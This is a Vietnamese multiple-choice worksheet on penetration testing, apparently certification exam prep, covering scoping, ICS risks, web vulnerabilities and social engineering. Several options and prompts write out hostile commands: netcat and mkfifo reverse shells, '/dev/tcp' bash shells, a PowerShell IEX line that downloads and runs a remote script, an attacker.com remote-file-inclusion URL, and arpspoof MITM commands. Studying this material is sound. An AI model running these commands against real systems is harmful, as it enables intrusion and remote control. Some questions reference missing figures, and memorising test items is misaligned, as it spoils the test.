Font size
Worksheets197 1
Total questions: 57
Worksheet time: 31mins
Câu 1: Đe dọa an toàn thông tin là gì?
a) Các biện pháp để đảm bảo tính bí mật của thông tin
b) Các hành động nhằm phá hoại, xâm nhập, hoặc gây hư hại đến thông tin
c) Công nghệ để bảo vệ thông tin khỏi sự truy cập trái phép
d) Các quy định pháp luật về an toàn thông tin
Câu 4. Một khách hàng đã lên lịch kiểm thử xâm nhập mạng không dây. Thông tin nào sau đây là cần thiết nhất để xác định phạm vi (scope) trước khi bắt đầu kiểm thử?
A. Vị trí vật lý và các ESSID mạng cần kiểm thử
B. Số lượng thiết bị không dây mà khách hàng sở hữu
C. Nhà cung cấp điểm truy cập không dây ưa thích của khách hàng
D. Các băng tần và tần số được sử dụng bởi thiết bị của khách hàng
Câu 5. Mô tả nào dưới đây phản ánh tốt nhất một số điểm yếu bảo mật nghiêm trọng của hệ thống điều khiển công nghiệp (ICS), như hệ thống trong nhà máy điện, khí đốt tự nhiên, đập và nhà máy hạt nhân?
A. Các nhà cung cấp ICS triển khai biện pháp bảo mật chậm
B. Nhân viên ICS không được đào tạo đầy đủ để thực hiện nhiệm vụ cơ bản
C. Thiếu thiết bị thay thế cho các thiết bị quan trọng
D. Các cơ sở ICS không tuân thủ quy định
Câu 6. Một nhà phân tích bảo mật nhận được báo cáo kiểm thử xâm nhập chi tiết được thực hiện trên môi trường DMZ của tổ chức. Báo cáo ghi nhận một phát hiện có điểm CVSS cơ bản là 10.0. Mức độ khó khai thác lỗ hổng này là gì?
A. Rất khó; các hệ thống biên thường được đặt sau tường lửa.
B. Hơi khó; cần sức mạnh xử lý đáng kể để khai thác.
C. Dễ; ít nỗ lực để khai thác lỗ hổng này.
D. Không thể; vì các máy chủ bên ngoài đã được bảo vệ chặt chẽ trước các cuộc tấn công.
Công cụ nào sau đây được dùng để thực hiện tấn công brute force tài khoản?
A. Hydra
B. John the Ripper
C. Hashcat
D. Peach
Một kiểm thử viên đã truy cập được vào thiết bị của một nhân viên bộ phận marketing. Kiểm thử viên muốn đảm bảo rằng nếu quyền truy cập bị phát hiện và bị gỡ bỏ, thì vẫn có thể giành lại quyền điều khiển. Hành động nào sau đây nên được thực hiện để duy trì truy cập? (Chọn HAI)
A. Thêm một mục vào HKLM\Software\Microsoft\CurrentVersion\Run để gọi au57d.ps1.
B. Thêm một mục vào C:\windows\system32\drivers\etc\hosts ánh xạ IP 12.17.20.10 tới badcomptia.com.
C. Đặt một tập lệnh vào thư mục C:\users%username%\local\appdata\roaming\temp\au57d.ps1.
D. Tạo một dịch vụ giả trong Windows tên là RTAudio để thực thi bằng tay.
Tình huống nào sau đây khiến một kiểm thử viên cần phải liên hệ với chủ hệ thống/khách hàng trong quá trình kiểm thử? (Chọn HAI)
A. Kiểm thử viên phát hiện dữ liệu cá nhân định danh (PII) trên hệ thống.
B. Hệ thống cho thấy có dấu hiệu đã bị xâm nhập trái phép trước đó.
C. Hệ thống thiếu các cấu hình bảo mật phù hợp.
D. Hệ thống bị dừng hoạt động sau khi thử khai thác.
Tại sao một kiểm thử viên lại chạy lệnh chkconfig --del tên_dịch_vụ vào cuối quá trình kiểm thử?
A. Để gỡ bỏ cơ chế duy trì truy cập.
B. Để kích hoạt cơ chế duy trì truy cập.
C. Để báo cáo về cơ chế duy trì truy cập.
D. Để kiểm tra cơ chế duy trì truy cập.
Một kiểm thử viên muốn tấn công dịch vụ tên NETBIOS. Lệnh nào sau đây có khả năng được dùng nhiều nhất để khai thác dịch vụ này?
A. arpspoof
B. nmap
C. responder
D. burpsuite
Một chuyên gia tư vấn bảo mật nhận được một tài liệu mô tả phạm vi của cuộc kiểm thử xâm nhập sắp tới. Tài liệu này chứa địa chỉ IP và thời gian mà từng địa chỉ có thể được quét. Tài liệu nào sau đây sẽ chứa thông tin này?
A. Quy tắc thực hiện (Rules of engagement)
B. Yêu cầu đề xuất (Request for proposal)
C. Thỏa thuận dịch vụ chính (Master service agreement)
D. Phân tích tác động kinh doanh (Business impact analysis)
Một kiểm thử viên xem lại kết quả quét của một ứng dụng web. Trong các lỗ hổng sau, lỗ hổng nào NGHIÊM TRỌNG NHẤT và nên được ưu tiên khai thác?
a
b
c
d
Một kiểm thử viên xem lại kết quả quét của một ứng dụng web. Trong các lỗ hổng sau, lỗ hổng nào NGHIÊM TRỌNG NHẤT và nên được ưu tiên khai thác?
A. Stored XSS
B. Full path disclosure
C. Expired certificate
D. Clickjacking
Một kiểm thử viên nhận thấy nhiều cổng có số lớn đang mở trên một máy chủ web công cộng. Tuy nhiên, chủ hệ thống cho biết ứng dụng chỉ sử dụng cổng 443. Khuyến nghị nào sau đây là phù hợp nhất?
A. Chuyển ứng dụng sang một cổng khác
B. Lọc cổng 443 chỉ cho phép một số IP
C. Triển khai tường lửa ứng dụng web
D. Vô hiệu hóa các dịch vụ không cần thiết
Một kiểm thử viên đã nhập một câu lệnh SQL injection vào ô nhập liệu và truy cập được vào cơ sở dữ liệu. Khuyến nghị TỐT NHẤT để giảm thiểu lỗ hổng này là gì?
A. Ngẫu nhiên hóa thông tin đăng nhập
B. Cài đặt hệ thống phát hiện xâm nhập trên máy chủ
C. Triển khai chuẩn hóa đầu vào
D. Cấu hình lại hệ thống để tăng độ bảo mật
Chiến lược kiểm thử hộp đen (black box) cung cấp cho kiểm thử viên điều gì?
A. Danh sách mục tiêu
B. Sơ đồ mạng
C. Mã nguồn
D. Thông tin đăng nhập có đặc quyền
Kiểm thử viên có thể sử dụng công cụ nào sau đây để thu thập thông tin nguồn mở (OSINT)? (Chọn HAI công cụ)
A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
Một kiểm thử viên đang thực hiện tấn công ARP spoofing trên một switch. Địa chỉ MAC nào nên được giả mạo để thu thập được NHIỀU thông tin NHẤT?
A. Địa chỉ MAC của máy khách
B. Địa chỉ MAC của domain controller
C. Địa chỉ MAC của máy chủ web
D. Địa chỉ MAC của gateway
Một kiểm thử viên có thể di chuyển ngang qua mạng rất dễ dàng sau khi chiếm quyền một máy trạm. Trong báo cáo, nên khuyến nghị những biện pháp giảm thiểu nào? (Chọn BA biện pháp)
A. Ngẫu nhiên hóa mật khẩu quản trị viên cục bộ cho mỗi máy
B. Vô hiệu hóa đăng nhập từ xa với tài khoản quản trị viên cục bộ
C. Yêu cầu xác thực đa yếu tố cho tất cả đăng nhập
D. Tăng độ phức tạp tối thiểu của mật khẩu
E. Tăng cường kiểm soát truy cập mạng
Một chuyên gia bảo mật đang cố gắng tấn công một thiết bị bằng một tài khoản người dùng đã được xác định trước. Kiểu tấn công nào sau đây đang được thực hiện?
A. Credential dump attack
B. DLL injection attack
C. Reverse shell attack
D. Pass the hash attack
Một kẻ tấn công muốn thực hiện tấn công MITM lên một máy tính với cấu hình mạng như sau:
IP: 192.168.1.20
Netmask: 255.255.255.0
Default Gateway: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10
Lệnh nào sau đây nên được sử dụng để thực hiện MITM attack?
A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20
Một khách hàng yêu cầu kiểm thử xâm nhập mạng bên ngoài vì lý do tuân thủ. Tuy nhiên, họ không muốn đưa IP nguồn của kiểm thử viên vào whitelist của hệ thống IPS trong suốt quá trình thử nghiệm. Lập luận nào sau đây là TỐT NHẤT để thuyết phục khách hàng nên thực hiện whitelist?
A. Whitelist giúp tránh các cuộc tấn công DoS vô tình lên IPS và các hệ thống giám sát log liên quan.
B. Kiểm thử các hệ thống IPS của bên thứ ba thường cần thêm tài liệu và quyền truy cập, có thể làm chậm tiến độ kiểm thử.
C. Các quy tắc whitelist của IPS cần cập nhật thường xuyên để đối phó với các lỗ hổng và rủi ro mới.
D. Kiểm thử nên tập trung vào phát hiện các vấn đề bảo mật của hệ thống trong phạm vi, thay vì đánh giá hiệu quả của hệ thống phòng thủ như IPS.
Một công ty năng lượng thuê một công ty bảo mật thực hiện kiểm thử xâm nhập tại nhà máy điện, nơi sử dụng ICS để quản lý việc phát điện và làm mát. Trong quá trình chuẩn bị, công ty bảo mật nên xem xét yếu tố nào sau đây vì nó đặc thù cho môi trường ICS?
A. Lựa chọn bộ công cụ kiểm thử bảo mật phù hợp
B. Dòng điện và tải của các thành phần ICS
C. Rủi ro vận hành và an toàn tiềm tàng
D. Chứng nhận điện cho phần cứng được sử dụng trong kiểm thử
Một tổ chức y tế phải tuân thủ các quy định địa phương để bảo vệ và chứng minh việc bảo vệ thông tin sức khỏe cá nhân. Kiểm thử viên nên kiểm tra điều kiện nào sau đây? (Chọn HAI đáp án)
A. Dữ liệu SNMP trap truyền đi ở dạng cleartext
B. Lỗi phần mềm trong hệ thống quản lý ticket IT
C. S/MIME certificate template được định nghĩa bởi CA
D. Thông tin sức khỏe được truyền qua HTTP
E. Mã hóa dữ liệu khi lưu (DAR) trên máy chủ lưu trữ hồ sơ
Tình huống nào sau đây là ví dụ của spear phishing?
A. Nhắm mục tiêu một giám đốc điều hành bằng tấn công SMS
B. Nhắm mục tiêu một nhóm cụ thể bằng email độc hại
C. Phát tán USB ngẫu nhiên để tấn công người dùng
D. Tấn công vào một tổ chức qua trang web thường ghé thăm (watering hole)
Một kiểm thử viên đang tạo các tệp XML đặc biệt để kiểm tra khả năng xử lý đầu vào của một ứng dụng Windows. Trước khi kiểm thử, kiểm thử viên nên yêu cầu tổ chức cung cấp tài liệu nào sau đây?
A. Các mẫu SOAP message
B. Tài liệu REST API
C. Công cụ protocol fuzzing
D. File XSD phù hợp
Trong quá trình khai thác buffer overflow đơn giản, kiểm thử viên cần ghi đè thanh ghi nào sau đây?
A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register
Trong lúc đánh giá ứng dụng web, kiểm thử viên phát hiện có thể thực thi lệnh tùy ý trên máy chủ. Để tiến xa hơn, kiểm thử viên muốn tạo reverse shell kết nối về máy tấn công tại IP 192.168.1.5. Những cách nào sau đây có thể sử dụng? (Chọn HAI đáp án)
A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 44444 > /tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.5 444444 > /tmp/f
Tại sao các thiết bị IoT cho người tiêu dùng thường kém an toàn hơn các hệ thống dành cho máy tính để bàn truyền thống?
A. Nhà sản xuất IoT ít chú trọng đến bảo mật hơn.
B. Khó áp dụng tiêu chuẩn bảo mật đồng bộ cho toàn hệ thống.
C. Hệ thống IoT thường thiếu tài nguyên phần cứng cho các giải pháp bảo mật cao.
D. Cơ quan quản lý thường yêu cầu mức độ bảo mật thấp hơn cho IoT.
Lệnh nào sau đây được dùng để khởi động cơ sở dữ liệu Metasploit?
A. msfconsole
B. workspace
C. msfvenom
Một công ty yêu cầu kiểm thử viên đánh giá tính bảo mật của ứng dụng Android do nội bộ phát triển. Kiểm thử viên nhận được file APK. Để thực hiện SAST, bước chuẩn bị nào sau đây là CẦN THIẾT đầu tiên? (Chọn HAI đáp án)
A. Chuyển đổi sang JAR
B. Decompile
C. Cross-compile ứng dụng
D. Chuyển JAR thành DEX
Một kiểm thử viên phát hiện các lỗ hổng trong bản quét lỗ hổng bên ngoài. Chiến lược tấn công nào nên được ƯU TIÊN từ kết quả quét trên?
A. Phần mềm lỗi thời có thể chứa các thành phần dễ bị khai thác.
B. Các thực hành quản lý mật khẩu yếu có thể đang được áp dụng.
C. Các giao thức mã hóa yếu có thể bị đánh chặn.
D. Cấu hình máy chủ web có thể tiết lộ thông tin nhạy cảm.
Một chuyên gia kiểm thử xâm nhập đang trong quá trình viết báo cáo trình bày mức độ rủi ro tổng thể đối với hoạt động. Nội dung này nên được đưa vào phần nào của báo cáo?
A. Phụ lục
B. Tóm tắt điều hành
C. Tóm tắt kỹ thuật
D. Nội dung chính
Một chuyên gia kiểm thử xâm nhập đang thực hiện đánh giá kiểu hộp đen cho một ứng dụng ngân hàng dựa trên web. Người kiểm thử chỉ được cung cấp URL đến trang đăng nhập. Dựa trên đoạn mã và kết quả đầu ra bên dưới: Người kiểm thử đang có ý định thực hiện điều gì?
A. Leo thang đặc quyền theo chiều ngang
B. Quét trang để tìm các trường ẩn
C. Phân tích mã phản hồi HTTP
D. Tìm kiếm các tiêu đề HTTP
Một chuyên gia kiểm thử xâm nhập muốn mở cửa sổ giao diện đồ họa từ một máy đã bị xâm nhập với IP 10.0.0.20 và hiển thị terminal trên máy cục bộ với IP 192.168.1.10. Câu lệnh nào sau đây sẽ thực hiện được việc này?
A. Từ máy từ xa, chạy các lệnh sau: export XHOST 192.168.1.10:0.0 rồi xhost+ Terminal
B. Từ máy cục bộ, chạy: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
C. Từ máy từ xa, chạy: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10; xhost+; xterm
D. Từ máy cục bộ, chạy: nc -l -p 6000, sau đó từ máy từ xa chạy: xterm | nc 192.168.1.10 6000
Một chuyên gia kiểm thử xâm nhập đang kiểm tra ứng dụng ngân hàng và phát hiện một lỗ hổng. Người kiểm thử đang đăng nhập với tư cách người dùng không có đặc quyền nhưng lại truy cập được dữ liệu. Dựa vào dữ liệu từ proxy chặn web: Lỗ hổng nào đang bị khai thác?
A. Lỗ hổng duyệt cưỡng bức (Forced browsing)
B. Lỗ hổng làm nhiễm tham số (Parameter pollution)
C. Lỗ hổng tải tệp (File upload)
D. Liệt kê cookie (Cookie enumeration)
Một chuyên gia kiểm thử xâm nhập chiếm quyền kiểm soát một hệ thống có quyền truy cập mạng không bị hạn chế qua cổng 443 đến bất kỳ máy chủ nào. Người kiểm thử muốn tạo một reverse shell từ máy nạn nhân trở lại máy tấn công. Phương pháp nào sau đây là khả thi nhất?
A. perl -e 'use SOCKET'; $i='<IP_NGUỒN>'; $p='443';
B. ssh superadmin@<IP_ĐÍCH> -p 443
C. nc -e /bin/sh <IP_NGUỒN> 443
D. bash -i >& /dev/tcp/<IP_ĐÍCH>/443 0>&1
Một chuyên gia kiểm thử phát hiện tiêu đề Content Security Policy bị thiếu trong một bài kiểm thử ứng dụng web. Kỹ thuật nào khả năng cao sẽ được áp dụng?
A. Tấn công chèn lệnh (Command injection)
B. Tấn công clickjacking
C. Tấn công truy xuất thư mục (Directory traversal)
D. Tấn công nhúng tệp từ xa (Remote file inclusion)
Những yếu tố nào là quan trọng nhất khi lập kế hoạch cho một đợt kiểm thử? (Chọn HAI)
A. Mục tiêu/đích đến
B. Sơ đồ kiến trúc
C. Mức chịu đựng ảnh hưởng
D. Thời gian lưu trữ báo cáo
E. Chính sách công ty
Dòng lệnh sau được tìm thấy trong file lịch sử của một máy đã bị khai thác. Kẻ tấn công đã chạy lệnh sau:
bash -i >& /dev/tcp/192.168.0.1/80 0>&1
Lệnh này thực hiện điều gì?
A. Quét cổng
B. Lấy banner của web server
C. Chuyển hướng TTY đến hệ thống từ xa
D. Xóa log lỗi của IP đã cung cấp
Việc sử dụng “công cụ chui qua khe cửa” trong một bài đánh giá an ninh vật lý là ví dụ cho kỹ thuật xâm nhập nào?
A. Mở khóa bằng tay (Lockpicking)
B. Kích hoạt cảm biến thoát hiểm (Egress sensor triggering)
C. Mở khóa bằng va đập (Lock bumping)
D. Vượt qua khóa (Lock bypass)
Trong khi kiểm thử, một lỗ hổng nghiêm trọng được phát hiện trên máy chủ chính của khách hàng. Hành động TIẾP THEO nên là gì?
A. Vô hiệu hóa cổng mạng của dịch vụ bị ảnh hưởng
B. Hoàn thành toàn bộ phát hiện, sau đó nộp cho khách hàng
C. Lập tức thông báo cho khách hàng với chi tiết phát hiện
D. Ngắt kết nối mục tiêu để tránh bị khai thác
Một chuyên gia kiểm thử đã triển khai thành công một Evil Twin và bắt đầu thấy lưu lượng truy cập từ nạn nhân. Bước tiếp theo là gì nếu muốn thu thập toàn bộ lưu lượng web không mã hóa từ nạn nhân?
A. Thực hiện tấn công hạ cấp HTTP
B. Thu thập thông tin đăng nhập để giải mã dữ liệu
C. Thực hiện tấn công Man-in-the-Middle
D. Tấn công giả mạo CA bằng cách mạo danh các CA đáng tin cậy
Sau khi truy cập vào hệ thống Linux với quyền thấp, chuyên gia kiểm thử phát hiện một tập tin nhị phân đáng chú ý trong thư mục người dùng tên là changepass có quyền -sr-xr-x. Kết quả lệnh strings changepass cho thấy các chuỗi setuid, ENV_PATH, changepw. Dựa vào thông tin này, cách khai thác nào KHẢ NĂNG CAO NHẤT để đạt quyền root?
A. Sao chép changepass đến thư mục có thể ghi và thiết lập biến môi trường ENV_PATH đến đường dẫn chứa tập tin changepw giả
B. Tạo bản sao changepass cùng thư mục, đổi tên thành changepw, export ENV_PATH là /home/user/, rồi chạy changepass
C. Export ENV_PATH đến thư mục ghi được chứa changepw giả, rồi chạy changepass
D. Chạy changepass trong thư mục hiện tại với sudo sau khi export ENV_PATH là /usr/local/bin
Một chuyên gia kiểm thử muốn viết script để dò tất cả các bản ghi RPTR cho một dải IP. Phương pháp nào là hiệu quả NHẤT?
A. nmap -p 53 -oG dnslist.txt | cut -d ':' -f4
B. nslookup -ns 8.8.8.8 < dnslist.txt
C. for x in {1...254}; do dig -x 192.168.$x.$x; done
D. dig -r; echo "8.8.8.8" >> /etc/resolv.conf
Dựa vào đoạn script Python dưới đây: đầu ra sẽ được gửi đi đâu?
A. Màn hình
B. Máy chủ mạng
C. Tệp tin
D. /dev/null
Một kỹ sư phát hiện quá trình đăng nhập người dùng gửi dữ liệu từ form qua phương thức HTTP GET. Để giảm thiểu rủi ro rò rỉ thông tin nhạy cảm, form nên được gửi qua:
A. Phương thức HTTP POST
B. Phương thức HTTP OPTIONS
C. Phương thức HTTP PUT
D. Phương thức HTTP TRACE
Một lập trình viên muốn kiểm thử mã ứng dụng để tìm các lỗ hổng. Quá trình nào sau đây nên được thực hiện?
A. Quét lỗ hổng
B. Quét động (Dynamic scan)
C. Quét tĩnh (Static scan)
D. Quét tuân thủ (Compliance scan)
51. Trong khi giám sát nhật ký WAF, một nhà phân tích bảo mật phát hiện một cuộc tấn công thành công vào URL sau:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Biện pháp khắc phục nào sau đây nên được thực hiện để ngăn chặn kiểu tấn công này?
A. Triển khai danh sách đen.
B. Chặn các chuyển hướng URL.
C. Mã hóa URL hai lần các tham số.
D. Ngăn ứng dụng thực hiện các cuộc gọi ra ngoài.
52. Một kiểm thử viên xâm nhập đã lấy được thông tin xác thực miền VPN ban đầu bằng cách phishing một thành viên của phòng CNTT. Sau đó, kiểm thử viên đã lấy được các hash qua VPN và dễ dàng phá được chúng bằng tấn công từ điển. Biện pháp khắc phục nào sau đây nên được khuyến nghị? (Chọn BA đáp án)
A. Bắt buộc tất cả nhân viên tham gia đào tạo nhận thức bảo mật.
B. Triển khai xác thực hai yếu tố cho truy cập từ xa.
C. Cài đặt hệ thống ngăn chặn xâm nhập.
D. Tăng yêu cầu độ phức tạp của mật khẩu.
53. Một email được gửi từ CEO đến CFO nói rằng cần chuyển tiền cho một nhà cung cấp mới. Cả hai đều không biết nhà cung cấp này, và CEO phủ nhận việc gửi email. Kiểu động lực tấn công nào đã được sử dụng?
A. Nguyên tắc sợ hãi
B. Nguyên tắc quyền lực
C. Nguyên tắc khan hiếm
D. Nguyên tắc giống nhau
54. Một kiểm thử viên xâm nhập báo cáo rằng ứng dụng đang sử dụng xác thực cơ bản (basic authentication) trên một ứng dụng hướng Internet. Chiến lược khắc phục nào là TỐT NHẤT?
A. Bật HTTP Strict Transport Security.
B. Bật cờ bảo mật cho cookie.
C. Mã hóa kênh truyền thông.
D. Làm sạch dữ liệu người dùng không hợp lệ.
55. Một kiểm thử viên xâm nhập đang thực hiện quét từ xa để xác định xem máy chủ có tuân thủ cấu hình phần mềm chuẩn của công ty hay không. Hành động nào sau đây nên được thực hiện để xác minh sự tuân thủ?
A. Quét khám phá (Discovery scan)
B. Quét ẩn danh (Stealth scan)
C. Quét toàn diện (Full scan)
D. Quét có xác thực (Credentialed scan)
56. Một kiểm thử viên xâm nhập đang xem xét đầu ra từ một thiết bị dò tín hiệu không dây. Điều nào sau đây có thể được suy luận từ thông tin trên?
A. Nhà sản xuất phần cứng
B. Nhiễu kênh
C. Tên người dùng
D. Độ mạnh của khóa mã hóa
57. Một kiểm thử viên bảo mật hoàn tất bài đánh giá toàn diện, phát hiện một lỗ hổng trong thư viện mã hóa TLS được sử dụng trong ứng dụng tính lương nội bộ. Bản vá chưa được phát hành nhưng sắp ra. Chiến lược nào dưới đây là TỐT NHẤT để giảm rủi ro?
A. Cấu hình lại máy chủ web để sử dụng bộ mã hóa mạnh hơn.
B. Đào tạo người dùng về rủi ro tạm thời khi sử dụng ứng dụng.
C. Áp dụng ACL để chỉ bộ phận tài chính có thể truy cập ứng dụng.
D. Bắt người dùng thay đổi mật khẩu trước và sau khi vá lỗi.
58. Một kiểm thử viên đang thực hiện rà soát mã nguồn. Kỹ thuật kiểm tra nào đang được sử dụng?
A. Phân tích động (Dynamic analysis)
B. Phân tích fuzzing
C. Phân tích tĩnh (Static analysis)
D. Phân tích thời gian chạy
59. Trong đánh giá bảo mật toàn diện, điều kiện tiên quyết nào sau đây là cần thiết để thực hiện tấn công kỹ nghệ xã hội bằng cách tiếp cận trực tiếp mục tiêu?
A. Xác định lối thoát khẩn cấp
B. Chuẩn bị một "tiểu sử giả" (pretext)
C. Quan sát qua vai (shoulder surfing)
D. Bám đuôi mục tiêu (tailgating)
60. Xem xét lệnh PowerShell sau:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1"); Invoke-Cmdlet
Câu nào sau đây mô tả chính xác nhất hành động của lệnh trên?
A. Thiết lập chính sách thực thi.
B. Thực thi một script từ xa.
C. Chạy lệnh được mã hóa.
D. Khởi tạo một đối tượng.
